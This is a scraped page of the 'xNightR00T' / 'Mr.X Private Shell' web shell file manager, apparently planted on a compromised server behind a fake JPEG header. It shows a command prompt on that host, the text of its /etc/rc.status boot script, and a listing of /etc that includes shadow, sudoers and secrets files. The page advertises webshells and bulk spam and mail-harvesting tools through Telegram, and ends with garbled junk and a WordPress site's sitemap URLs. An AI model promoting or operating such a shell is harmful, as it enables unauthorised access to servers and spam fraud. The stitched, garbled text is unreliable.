xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# /etc/rc.status
# vim: syntax=sh
# Definition of boot script return messages
#
#   The bootscripts should use the variables rc_done and rc_failed to
#   report whether they failed or succeeded.  See /etc/init.d/skeleton for
#   an example how the shell functions rc_status and rc_reset are used.
#
#   These functions make use of the variables rc_done and rc_failed;
#   rc_done_up and rc_failed_up are the same as rc_done and rc_failed
#   but contain a terminal code to move up one line before the output
#   of the actual string. (This is particularly useful when the script
#    starts a daemon which produces user output with a newline character)
#
#   The variable rc_reset is used by the master resource control script
#   /etc/init.d/rc to turn off all attributes and switch to the standard
#   character set.
#
#    \033          ascii ESCape
#    \033[<NUM>G   move to column <NUM> (linux console, xterm, not vt100)
#    \033[<NUM>C   move <NUM> columns forward but only upto last column
#    \033[<NUM>D   move <NUM> columns backward but only upto first column
#    \033[<NUM>A   move <NUM> rows up
#    \033[<NUM>B   move <NUM> rows down
#    \033[1m       switch on bold
#    \033[31m      switch on red
#    \033[32m      switch on green
#    \033[33m      switch on yellow
#    \033[m        switch off color/bold
#    \017          exit alternate mode (xterm, vt100, linux console)
#    \033[10m      exit alternate mode (linux console)
#    \015          carriage return (without newline)
#

# Check if the service is used under systemd but not started with
if test -z "$SYSTEMD_NO_WRAP" && /usr/bin/mountpoint -q /sys/fs/cgroup/systemd; then
    if test $PPID -ne 1 -a $# -eq 1 ; then
	_rc_base=
	_sd_opts=
	case "$0" in
	/etc/init.d/boot.*)
	    _rc_base=${0##*/boot.} ;;
	/etc/init.d/*|/etc/rc.d/*)
	    _rc_base=${0##*/} ;;
	*/rc*)
	    if test -L "$0"; then
		_rc_base=`readlink "$0"`
		_rc_base=${_rc_base##*/}
		case "$_rc_base" in
		boot.*) _rc_base=${_rc_base#boot.}
		esac
	    else
		_rc_base=${0##*/rc}
	    fi
	    ;;
	esac
	_rc_system=$(/usr/bin/systemctl show --system --no-pager -p NeedDaemonReload \
		     -p UnitFileState -p LoadState "${_rc_base}.service" 2>/dev/null)
	case "$_rc_system" in
	*LoadState=masked*)
	    echo "Error: ${_rc_base} is masked out and forbidden by systemd" 1>&2
	    exit 2 ;;
	*UnitFileState=static*)
	    echo "Skipped: ${_rc_base} is overwritten by a native systemd unit" 1>&2
	    exit 2 ;;
	*NeedDaemonReload=yes*)
	    /usr/bin/systemctl --system --no-pager daemon-reload
	esac
	unset _rc_system
	case "$1" in
	    status)
		SYSTEMD_NO_WRAP=1 "$0" "$1"
		_sd_opts='--lines=0 --full --output=cat'
		;;
	    start|stop|reload|restart|try-restart|force-reload)
		echo "redirecting to systemctl $1 ${_rc_base}.service" 1>&2
		_sd_opts='--ignore-dependencies'
		;;
	    *)	unset _rc_base
	esac
	if test -n "$_rc_base" -a -x /usr/bin/systemctl ; then
	    exec /usr/bin/systemctl $_sd_opts $1 "${_rc_base}.service"
	fi
	unset _rc_base _sd_opts
    fi
    if test -z "$REDIRECT" -a -x /sbin/showconsole ; then
	REDIRECT="$(/sbin/showconsole 2>/dev/null)"
	test -z "$CONSOLE" && CONSOLE=/dev/console
	export REDIRECT CONSOLE
    fi
fi

# Do _not_ be fooled by non POSIX locale
LC_ALL=POSIX
export LC_ALL

# Seek for terminal size and, if needed, set default size
rc_lc () {
    if test -n "$REDIRECT" ; then
	set -- $(stty size < "$REDIRECT"  2> /dev/null || echo 0 0)
    else
	set -- $(stty size 2> /dev/null || echo 0 0)
    fi
    LINES=$1
    COLUMNS=$2
    if test $LINES -eq 0 -o $COLUMNS -eq 0; then
	LINES=24
	COLUMNS=80
	TERM=dumb
    fi
}
trap 'rc_lc' SIGWINCH
test -n "$COLUMNS" -a -n "$LINES" || rc_lc
export LINES COLUMNS

# Make sure we have /sbin and /usr/sbin in PATH
case ":$PATH:" in 
    *:/sbin:*)
	;;
    *)
	PATH=/sbin:/usr/sbin:/usr/local/sbin:$PATH
	export PATH
	;;
esac

if test -t 1 -a "$TERM" != "raw" -a "$TERM" != "dumb"; then
	 esc=`echo -en "\033"`
        extd="${esc}[1m"
        warn="${esc}[1;31m"
        done="${esc}[1;32m"
        attn="${esc}[1;33m"
        norm=`echo -en "${esc}[m\017"`
        stat=`echo -en "\015${esc}[${COLUMNS}C${esc}[10D"`

     rc_done="${stat}${done}done${norm}"
  rc_running="${stat}${done}running${norm}"
   rc_failed="${stat}${warn}failed${norm}"
   rc_missed="${stat}${warn}missing${norm}"
  rc_skipped="${stat}${attn}skipped${norm}"
     rc_dead="${stat}${warn}dead${norm}"
   rc_unused="${stat}${extd}unused${norm}"
  rc_unknown="${stat}${attn}unknown${norm}"
  rc_done_up="${esc}[1A${rc_done}"
rc_failed_up="${esc}[1A${rc_failed}"
    rc_reset="${norm}${esc}[?25h"
     rc_save="${esc}7${esc}[?25l"
  rc_restore="${esc}8${esc}[?25h"
    rc_cuu () { test $1 -eq 0 && return; echo -en "\033[${1}A"; }
    rc_cud () { test $1 -eq 0 && return; echo -en "\033[${1}B"; }
    rc_timer_on () {
	# Draw seconds of running timout to column.
	# Two arguments: timeout in seconds and offset
	local n=$1
	local c=$2
	(trap "exit 0" SIGTERM
	 while test $((n--)) -gt 0; do
	    sleep 1;
	    if test $n -gt 9 ; then
		echo -en "\015${esc}[${c}C(${n}s) "
	    else
		echo -en "\015${esc}[${c}C( ${n}s) "
	    fi
	done) & _rc_timer_pid=$!
    }
    rc_timer_off () {
	if test -n "$_rc_timer_pid" ; then
	    kill -TERM $_rc_timer_pid > /dev/null 2>&1
	fi
	unset _rc_timer_pid
    }
else
	 esc=""
        extd=""
        warn=""
        done=""
        attn=""
        norm=""
        stat=""

     rc_done="..done"
  rc_running="..running"
   rc_failed="..failed"
   rc_missed="..missing"
  rc_skipped="..skipped"
     rc_dead="..dead"
   rc_unused="..unused"
  rc_unknown="..unknown"
  rc_done_up="${rc_done}"
rc_failed_up="${rc_failed}"
    rc_reset=""
     rc_save=""
  rc_restore=""
    rc_cuu () { return; }
    rc_cud () { return; }
    rc_timer_on  () { return; }
    rc_timer_off () { return; }
fi

_rc_service=${0##*/[SK][0-9][0-9]}
_rc_status=0
_rc_status_all=0
_rc_todo=$1

rc_check ()
{
    _rc_status_ret=$?
    test $_rc_status_ret -eq 0 || _rc_status=$_rc_status_ret
    test $_rc_status     -eq 0 || _rc_status_all=$_rc_status
    return $_rc_status_ret
}

rc_reset ()
{
    _rc_status=0
    _rc_status_all=0
    rc_check
    return 0
}

if   test "$_rc_todo" = "status" ; then
rc_status ()
{
    rc_check
    _rc_status_ret=$_rc_status
    local i
    for i ; do
	case "$i" in
	-v|-v[1-9]|-v[1-9][0-9])
	    local vrt=""
	    local out=1
	    local opt="en"

	    test -n "${i#-v}" && vrt=${esc:+"${esc}[${i#-v}A"} || opt="e"
	    case "$_rc_status" in
	    0)	vrt="$vrt$rc_running";		;; # service running
	    1)	vrt="$vrt$rc_dead"   ; out=2	;; # service dead (but has pid file)
	    2)	vrt="$vrt$rc_dead"   ; out=2	;; # service dead (but has lock file)
	    3)	vrt="$vrt$rc_unused" ;		;; # service not running
	    4)	vrt="$vrt$rc_unknown";		;; # status is unknown
	    esac
	    echo -$opt "$rc_save$vrt$rc_restore" 1>&$out

	    # reset _rc_status to 0 after verbose case
	    _rc_status=0 ;;
	-r) rc_reset ;;
	-s) echo -e "$rc_skipped" ; rc_failed 3 ;;
	-u) echo -e "$rc_unused"  ; rc_failed 3 ;;
	*)  echo "rc_status: Usage: [-v[<num>] [-r]|-s|-u]" 1>&2 ; return 0 ;;
	esac
    done
    return $_rc_status_ret
}
elif test -n "$_rc_todo" ; then
rc_status ()
{
    rc_check
    test "$_rc_status" -gt 7 && rc_failed 1
    _rc_status_ret=$_rc_status
    case "$_rc_todo" in
    stop)
	# program is not running which
	# is success if we stop service
	test "$_rc_status" -eq 7 && rc_failed 0 ;;
    esac
    local i
    for i ; do
	case "$i" in
	-v|-v[1-9]|-v[1-9][0-9])
	    local vrt=""
	    local out=1
	    local opt="en"

	    test -n "${i#-v}" && vrt=${esc:+"${esc}[${i#-v}A"} || opt="e"
	    case "$_rc_status" in
	    0)	vrt="$vrt$rc_done"   ;		;; # success
	    1)	vrt="$vrt$rc_failed" ; out=2	;; # generic or unspecified error
	    2)	vrt="$vrt$rc_failed" ; out=2	;; # invalid or excess args
	    3)	vrt="$vrt$rc_missed" ; out=2	;; # unimplemented feature
	    4)	vrt="$vrt$rc_failed" ; out=2	;; # insufficient privilege
	    5)	vrt="$vrt$rc_skipped"; out=2	;; # program is not installed
	    6)	vrt="$vrt$rc_unused" ; out=2	;; # program is not configured
	    7)	vrt="$vrt$rc_failed" ; out=2	;; # program is not running
	    *)	vrt="$vrt$rc_failed" ; out=2	;; # unknown (maybe used in future)
	    esac
	    echo -$opt "$rc_save$vrt$rc_restore" 1>&$out

	    # reset _rc_status to 0 after verbose case
	    _rc_status=0 ;;
	-r) rc_reset ;;
	-s) echo -e "$rc_skipped" 1>&2 ; rc_failed 5 ;;
	-u) echo -e "$rc_unused"  1>&2 ; rc_failed 6 ;;
	*)  echo "rc_status: Usage: [-v[<num>] [-r]|-s|-u]" 1>&2 ; return 0 ;;
	esac
    done
    return $_rc_status_ret
}
else
rc_status ()
{
    rc_check
    _rc_status_ret=$_rc_status
    local i
    for i ; do
	case "$i" in
	-v|-v[1-9]|-v[1-9][0-9])
	    local vrt=""
	    local out=1
	    local opt="en"

	    test -n "${i#-v}" && vrt=${esc:+"${esc}[${i#-v}A"} || opt="e"
	    case "$_rc_status" in
	    0)	vrt="$vrt$rc_done"  ;		;; # success
	    *)	vrt="$vrt$rc_failed"; out=2	;; # failed
	    esac
	    echo -$opt "$rc_save$vrt$rc_restore" 1>&$out

	    # reset _rc_status to 0 after verbose case
	    _rc_status=0 ;;
	-r) rc_reset ;;
	-s) echo -e "$rc_skipped"  ; return 0 ;;
	-u) echo -e "$rc_unused"   ; return 0 ;;
	*)  echo "rc_status: Usage: [-v[<num>] [-r]|-s|-u]" 1>&2 ; return 0 ;;
	esac
    done
    return $_rc_status_ret
}
fi

rc_failed ()
{
    rc_reset
    case "$1" in
    [0-7]) _rc_status=$1 ;;
    "")    _rc_status=1
    esac
    rc_check
    return $_rc_status
}

rc_exit ()
{
    exit $_rc_status_all
}

rc_confirm()
{
    local timeout="30"
    local answer=""
    local ret=0

    case "$1" in
    -t) timeout=$2; shift 2 ;;
    esac
    local message="$@, (Y)es/(N)o/(C)ontinue? [y] "
    : ${REDIRECT:=/dev/tty}

    while true ; do
	read -t ${timeout} -n 1 -p "${message}" answer < $REDIRECT > $REDIRECT 2>&1
	case "$answer" in
	[yY]|"") ret=0; break ;;
	[nN])	 ret=1; break ;;
	[cC])	 ret=2; break ;;
	*)	 echo; continue
	esac
    done
    echo
    return $ret
}

rc_active ()
{
    local link
    for link in /etc/init.d/*.d/S[0-9][0-9]${1} ; do
	test -e $link || break
	return 0
    done
    return 1
}

rc_splash()
{
    return 0
}

# Wait between last SIGTERM and the next SIGKILL
# any argument specify a *path* of a process which
# process identity should *not* be checked.
rc_wait()
{
    local -i etime=$SECONDS

    if test -f /fastboot ; then
	let etime+=2
    else
	let etime+=6
    fi

    local -i pid
    local -i ppid=$$
    local comm state rest
    local parent_processes="$ppid"

    while test $ppid -gt 1; do
	read -t 1 pid comm state ppid rest < /proc/$ppid/stat
	parent_processes="${parent_processes:+$parent_processes:}${ppid}"
    done
    for comm ; do
	test -s $comm || continue
	ppid="$(/sbin/pidofproc $comm 2> /dev/null)" || continue
	parent_processes="${parent_processes:+$parent_processes:}${ppid}"
    done
    unset comm state ppid rest

    local -i busy
    while test $SECONDS -lt $etime; do
	let busy=0
	for proc in /proc/[0-9]* ; do
	    test -e $proc/exe || continue
	    let pid=${proc##*/}
	    case ":${parent_processes}:" in
	    *:${pid}:*) continue
	    esac
	    let busy=pid
	    break
	done
	test $busy -ne 0 || return 0
	usleep 500000
    done
}

rc_runlevel()
{
    test -z "$RUNLEVEL" || return
    set -- $(/sbin/runlevel)
    PREVLEVEL=$1
    RUNLEVEL=$2
    export PREVLEVEL RUNLEVEL
}

cmdline=""
rc_cmdline()
{
    local arg cmd key val
    test -e /proc/cmdline || mount -nt proc proc /proc
    test -n "$cmdline"    || read -t 2 cmdline < /proc/cmdline
    for arg; do
	for cmd in $cmdline ; do
	    key="${cmd%%=*}"
	    key="${key//-/_}"
	    case "${key}" in
	    $arg)
		case "$cmd" in
		*=*) val="${cmd#*=}" ;;
		*)   val=yes
		esac
		echo $key=$val
		return 0
	    esac
	done
    done
    return 1
}

Filemanager

Name Type Size Permission Actions
ConsoleKit Folder 0755
ImageMagick Folder 0755
ImageMagick-SUSE Folder 0755
NetworkManager Folder 0755
X11 Folder 0755
YaST2 Folder 0755
aliases.d Folder 0755
alternatives Folder 0755
apache2 Folder 0755
audisp Folder 0750
audit Folder 0750
auto.master.d Folder 0755
autoinstall Folder 0700
bash_completion.d Folder 0755
binfmt.d Folder 0755
ca-certificates Folder 0755
cifs-utils Folder 0755
cron.d Folder 0755
cron.daily Folder 0755
cron.hourly Folder 0755
cron.monthly Folder 0755
cron.weekly Folder 0755
cups Folder 0755
dbus-1 Folder 0755
dconf Folder 0755
default Folder 0755
depmod.d Folder 0755
dirmngr Folder 0755
dracut.conf.d Folder 0755
fonts Folder 0755
gdbinit.d Folder 0755
gnupg Folder 0755
gpm Folder 0755
grub.d Folder 0755
gtk-3.0 Folder 0755
icewm Folder 0755
init.d Folder 0755
ipmi Folder 0755
iproute2 Folder 0755
iscsi Folder 0755
issue.d Folder 0755
java Folder 0755
joe Folder 0755
ld.so.conf.d Folder 0755
libnl Folder 0755
logrotate.d Folder 0755
logwatch Folder 0755
lvm Folder 0755
mcelog Folder 0755
modprobe.d Folder 0755
modules-load.d Folder 0755
multipath Folder 0700
my.cnf.d Folder 0755
named.d Folder 0755
netconfig.d Folder 0755
news Folder 0750
nginx Folder 0755
omc Folder 0755
one-context.d Folder 0755
openldap Folder 0755
opielocks Folder 0755
opt Folder 0755
pam.d Folder 0755
permissions.d Folder 0755
pkcs11 Folder 0755
pki Folder 0755
plymouth Folder 0755
polkit-1 Folder 0755
postfix Folder 0755
ppp Folder 0750
pptp.d Folder 0755
products.d Folder 0755
profile.d Folder 0755
pulse Folder 0755
qemu Folder 0755
rc.d Folder 0755
reader.conf.d Folder 0755
request-key.d Folder 0755
rpm Folder 0755
rsyslog.d Folder 0755
samba Folder 0755
sasl2 Folder 0755
security Folder 0755
selinux Folder 0755
sensors.d Folder 0755
skel Folder 0755
slp.reg.d Folder 0755
smartd_warning.d Folder 0755
snapper Folder 0755
snmp Folder 0755
ssh Folder 0755
ssl Folder 0755
sudoers.d Folder 0750
susehelp.d Folder 0755
sysconfig Folder 0755
sysctl.d Folder 0755
systemd Folder 0755
tmpdirs.d Folder 0755
tmpfiles.d Folder 0755
udev Folder 0755
uefi Folder 0755
unixODBC Folder 0755
uucp Folder 0750
vmware-tools Folder 0755
wicked Folder 0755
xdg Folder 0755
xinetd.d Folder 0755
zsh_completion.d Folder 0755
zypp Folder 0755
.pwd.lock File 0 B 0600
.updated File 163 B 0644
DIR_COLORS File 2.81 KB 0644
HOSTNAME File 19 B 0644
Muttrc File 152.85 KB 0644
SUSE-brand File 17 B 0644
SUSEConnect.example File 394 B 0644
SuSE-release File 215 B 0644
aclocal_dirlist File 25 B 0644
adjtime File 44 B 0644
aliases File 2.52 KB 0644
aliases.db File 12 KB 0644
at.deny File 62 B 0640
auto.master File 798 B 0644
auto.misc File 524 B 0644
auto.net File 902 B 0755
auto.smb File 2.14 KB 0755
autofs.conf File 14.02 KB 0644
autofs_ldap_auth.conf File 232 B 0600
bash.bashrc File 9.17 KB 0644
bash_command_not_found File 1.3 KB 0644
bind.keys File 1.82 KB 0644
bindresvport.blacklist File 415 B 0644
blkid.conf File 135 B 0644
bmc-snmp-proxy File 1.61 KB 0644
c-client.cf File 52 B 0644
cron.deny File 6 B 0600
crontab File 255 B 0600
cryptconfig.conf File 75 B 0644
csh.cshrc File 4.49 KB 0644
csh.login File 6.97 KB 0644
defaultdomain File 0 B 0644
dhclient.conf File 1.89 KB 0644
dhclient6.conf File 859 B 0644
dracut.conf File 117 B 0644
environment File 97 B 0644
ethers File 605 B 0644
exchange-bmc-os-info File 850 B 0644
exports File 322 B 0644
filesystems File 26 B 0644
fstab File 279 B 0644
ftpusers File 565 B 0644
gai.conf File 2.52 KB 0644
gdbinit File 211 B 0644
gemrc File 346 B 0644
generateCRL.conf File 448 B 0600
gnome_defaults.conf File 3.01 KB 0644
group File 678 B 0644
group- File 671 B 0644
host.conf File 370 B 0644
hostname File 19 B 0644
hosts File 687 B 0644
hosts.allow File 2.58 KB 0644
hosts.deny File 149 B 0644
hosts.equiv File 188 B 0644
hosts.lpd File 191 B 0644
hushlogins File 1 B 0644
idmapd.conf File 144 B 0644
inputrc File 14.56 KB 0644
insserv.conf File 171 B 0644
ipmievd File 58 B 0644
iscsid.conf File 12.74 KB 0600
issue File 78 B 0644
issue.net File 75 B 0644
krb5.conf File 771 B 0644
ld.so.cache File 49.42 KB 0644
ld.so.conf File 206 B 0644
lesskey File 899 B 0644
lesskey.bin File 405 B 0644
libaudit.conf File 191 B 0640
localtime File 351 B 0644
login.defs File 8.8 KB 0644
logrotate.conf File 517 B 0644
machine-id File 33 B 0444
magic File 113 B 0644
mail.rc File 112 B 0644
manpath.config File 11.78 KB 0644
mime.types File 100.51 KB 0644
mke2fs.conf File 808 B 0644
mkshrc File 9.17 KB 0644
motd File 1.54 KB 0644
mtab File 0 B 0444
mtools.conf File 2.09 KB 0644
my.cnf File 202 B 0644
netconfig File 767 B 0644
netgroup File 796 B 0644
netscsid.conf File 2.02 KB 0644
networks File 225 B 0644
nfsmount.conf File 3.31 KB 0644
nscd.conf File 2.33 KB 0644
nsswitch.conf File 1.16 KB 0644
ntp.conf File 3.04 KB 0640
ntp.keys File 28 B 0640
openct.conf File 2.95 KB 0644
opensc.conf File 21.6 KB 0644
opiekeys File 0 B 0600
os-release File 160 B 0644
passwd File 1.54 KB 0644
passwd- File 1.53 KB 0644
permissions File 12.08 KB 0644
permissions.easy File 18.36 KB 0644
permissions.local File 1.52 KB 0644
permissions.paranoid File 19.25 KB 0644
permissions.secure File 20.96 KB 0644
php.ini File 0 B 0644
polkit-default-privs.local File 486 B 0644
polkit-default-privs.restrictive File 37.07 KB 0644
polkit-default-privs.standard File 42.36 KB 0644
profile File 9 KB 0644
protocols File 22.71 KB 0644
python3start File 737 B 0644
pythonstart File 834 B 0644
quotagrpadmins File 220 B 0644
quotatab File 261 B 0644
raw File 221 B 0644
rc.splash File 2.64 KB 0644
rc.status File 11.5 KB 0644
request-key.conf File 1.85 KB 0644
resolv.conf File 38 B 0644
resolv.conf.netconfig File 833 B 0644
rmt File 34.83 KB 0755
rpc File 1.6 KB 0644
rsyncd.conf File 338 B 0644
rsyncd.secrets File 14 B 0600
rsyslog.conf File 4.6 KB 0600
screenrc File 127 B 0644
securetty File 161 B 0644
sensors3.conf File 9.98 KB 0644
services File 837.88 KB 0644
sestatus.conf File 216 B 0644
shadow File 790 B 0640
shadow- File 664 B 0640
shells File 268 B 0644
slp.conf File 13.41 KB 0644
slp.reg File 1.37 KB 0644
slp.spi File 2.64 KB 0644
smart_drivedb.h File 91 B 0644
smartd.conf File 6.98 KB 0644
smartd_warning.sh File 5.75 KB 0755
sudoers File 3.31 KB 0440
sysctl.conf File 560 B 0644
termcap File 1006 KB 0644
ttytype File 258 B 0644
vconsole.conf File 10 B 0644
vimrc File 7.82 KB 0644
vsftpd.conf File 7.57 KB 0600
warnquota.conf File 3.71 KB 0644
wgetrc File 4.48 KB 0644
wodim.conf File 1.31 KB 0644
xattr.conf File 654 B 0644
xinetd.conf File 1.42 KB 0644
yp.conf File 779 B 0644
zce.env File 139 B 0644
zce.rc File 169 B 0644
zprofile File 199 B 0644
zsh_command_not_found File 313 B 0644
zshenv File 45 B 0644
zshrc File 6.96 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml